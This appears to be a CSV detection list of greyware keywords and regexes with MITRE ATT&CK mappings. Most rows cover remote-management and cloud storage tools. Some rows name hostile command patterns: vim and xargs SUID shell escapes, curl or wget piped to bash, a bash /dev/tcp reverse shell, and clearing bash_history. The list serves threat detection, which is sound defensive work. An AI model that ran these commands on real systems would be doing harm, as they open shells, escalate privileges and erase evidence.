"*vim -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vim\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*vimdiff -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vimdiff\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*xargs -a /dev/null sh -p*",".{0,1000}xargs\s\-a\s\/dev\/null\ssh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*>Auvik Networks Inc.<*",".{0,1000}\>Auvik\sNetworks\sInc\.\<.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*auvik.agent.exe*",".{0,1000}auvik\.agent\.exe.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AuvikService.exe*",".{0,1000}AuvikService\.exe.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.my.auvik.com/*",".{0,1000}https\:\/\/.{0,1000}\.my\.auvik\.com\/.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.aweray.net*",".{0,1000}\.aweray\.net.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Aweray_Remote_*.exe*",".{0,1000}\/Aweray_Remote_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Aweray_Remote_*.zip*",".{0,1000}\/Aweray_Remote_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Aweray Remote.lnk*",".{0,1000}\\Aweray\sRemote\.lnk.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Aweray_Remote_*.exe*",".{0,1000}\\Aweray_Remote_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Aweray_Remote_*.zip*",".{0,1000}\\Aweray_Remote_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AweSun.exe*",".{0,1000}\\AweSun\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Aweray*",".{0,1000}\\Program\sFiles\\Aweray.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Software\AweSun\SunLogin\SunloginClient*",".{0,1000}\\Software\\AweSun\\SunLogin\\SunloginClient.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AweRay Limited<*",".{0,1000}\>AweRay\sLimited\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AweRay Pte. Ltd.<*",".{0,1000}\>AweRay\sPte\.\sLtd\.\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AweSun.exe<*",".{0,1000}\>AweSun\.exe\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>AweSun<*",".{0,1000}\>AweSun\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*asapi.aweray.net*",".{0,1000}asapi\.aweray\.net.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*as-tk.aweray.com*",".{0,1000}as\-tk\.aweray\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*as-tk.aweray.com/track*",".{0,1000}as\-tk\.aweray\.com\/track.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Aweray_Remote.exe*",".{0,1000}Aweray_Remote\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*awerayimg.com*",".{0,1000}awerayimg\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*client-api.aweray.com*",".{0,1000}client\-api\.aweray\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://sun.aweray.com/*/download*",".{0,1000}https\:\/\/sun\.aweray\.com\/.{0,1000}\/download.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*install.bat AweSun*",".{0,1000}install\.bat\sAweSun.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh  advfirewall firewall * rule name=""AweSun*",".{0,1000}netsh\s\sadvfirewall\sfirewall\s.{0,1000}\srule\sname\=\""AweSun.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*iolonopooapdagdemdoaihahlfkncfgg*",".{0,1000}iolonopooapdagdemdoaihahlfkncfgg.{0,1000}","greyware_tool_keyword","Azino VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/Microsoft Azure Storage Explorer.app*",".{0,1000}\/Microsoft\sAzure\sStorage\sExplorer\.app.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/Microsoft Azure Storage Explorer.zip*",".{0,1000}\/Microsoft\sAzure\sStorage\sExplorer\.zip.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\Microsoft Azure Storage Explorer.zip*",".{0,1000}\\Microsoft\sAzure\sStorage\sExplorer\.zip.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*>Microsoft Azure Storage Explorer Setup<*",".{0,1000}\>Microsoft\sAzure\sStorage\sExplorer\sSetup\<.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*>Microsoft Azure Storage Explorer<*",".{0,1000}\>Microsoft\sAzure\sStorage\sExplorer\<.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*036a9029e3b883ded8de9d9bdde3f63dd86d3403b7ed767b1efc3037c9d37bc4*",".{0,1000}036a9029e3b883ded8de9d9bdde3f63dd86d3403b7ed767b1efc3037c9d37bc4.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*7fa49a08d05a3616b5a24f52645d76c4496c37f5060a6bd4a648f534c4e85ae0*",".{0,1000}7fa49a08d05a3616b5a24f52645d76c4496c37f5060a6bd4a648f534c4e85ae0.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*c798b2aedc7a74f0daf51eb216aae8cb48b45f208b0409916442b1d61d2ad2ef*",".{0,1000}c798b2aedc7a74f0daf51eb216aae8cb48b45f208b0409916442b1d61d2ad2ef.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*com.microsoft.StorageExplorer*",".{0,1000}com\.microsoft\.StorageExplorer.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*Microsoft Azure Storage Explorer.app/Contents/*",".{0,1000}Microsoft\sAzure\sStorage\sExplorer\.app\/Contents\/.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*StorageExplorer-linux-x64.tar.gz*",".{0,1000}StorageExplorer\-linux\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*StorageExplorer-windows-x64.exe*",".{0,1000}StorageExplorer\-windows\-x64\.exe.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.apitest.barracudamsp.com*",".{0,1000}\.apitest\.barracudamsp\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Applications/Managed Workplace/Onsite Manager/logs/*",".{0,1000}\/Applications\/Managed\sWorkplace\/Onsite\sManager\/logs\/.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\BRMM_2024.1-Release*",".{0,1000}\\BRMM_2024\.1\-Release.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MWDiagnosticCollector.exe*",".{0,1000}\\MWDiagnosticCollector\.exe.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MWDiagnosticCollectorResult_*.zip*",".{0,1000}\\MWDiagnosticCollectorResult_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Barracuda RMM\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Barracuda\sRMM\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Level Platforms\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Level\sPlatforms\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Barracuda RMM\*",".{0,1000}\\Program\sFiles\\Barracuda\sRMM\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Level Platforms\*",".{0,1000}\\Program\sFiles\\Level\sPlatforms\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\Barracuda MSP\*",".{0,1000}\\ProgramData\\Barracuda\sMSP\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Level Platforms\Managed Workplace\*",".{0,1000}\\SOFTWARE\\Level\sPlatforms\\Managed\sWorkplace\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Barracuda MSP<*",".{0,1000}\>Barracuda\sMSP\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Barracuda Networks, Inc.*",".{0,1000}\>Barracuda\sNetworks,\sInc\..{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Barracuda RMM Setup AutoRun<*",".{0,1000}\>Barracuda\sRMM\sSetup\sAutoRun\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Barracuda RMM Setup<*",".{0,1000}\>Barracuda\sRMM\sSetup\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Barracuda RMM*<*",".{0,1000}\>Barracuda\sRMM.{0,1000}\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>LPI Level Platforms<*",".{0,1000}\>LPI\sLevel\sPlatforms\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Barracuda RMM Onsite Manager - InstallShield Wizard*",".{0,1000}Barracuda\sRMM\sOnsite\sManager\s\-\sInstallShield\sWizard.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Barracuda RMM Onsite Manager.msi*",".{0,1000}Barracuda\sRMM\sOnsite\sManager\.msi.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rmm.barracudamsp.com*",".{0,1000}rmm\.barracudamsp\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*whatsmyip.ccrmm.avg.com*",".{0,1000}whatsmyip\.ccrmm\.avg\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formely AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*| base64 -d *",".{0,1000}\|\sbase64\s\-d\s.{0,1000}","greyware_tool_keyword","base64","suspicious base64 commands used by the offensive tool traitor and other tools","T1140 - T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","FP risks","7","10","N/A","N/A","N/A","N/A"
"*base64 -d /tmp/*",".{0,1000}base64\s\-d\s\/tmp\/.{0,1000}","greyware_tool_keyword","base64","suspicious base64 commands used by the offensive tool traitor and other tools","T1140 - T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","FP risks","7","10","N/A","N/A","N/A","N/A"
"*bash -c *curl *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}curl\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*bash -c *wget *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}wget\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*cat /dev/null > *bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*echo * .bash_history*",".{0,1000}echo\s.{0,1000}\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*echo * /home/*/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*echo * /root/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
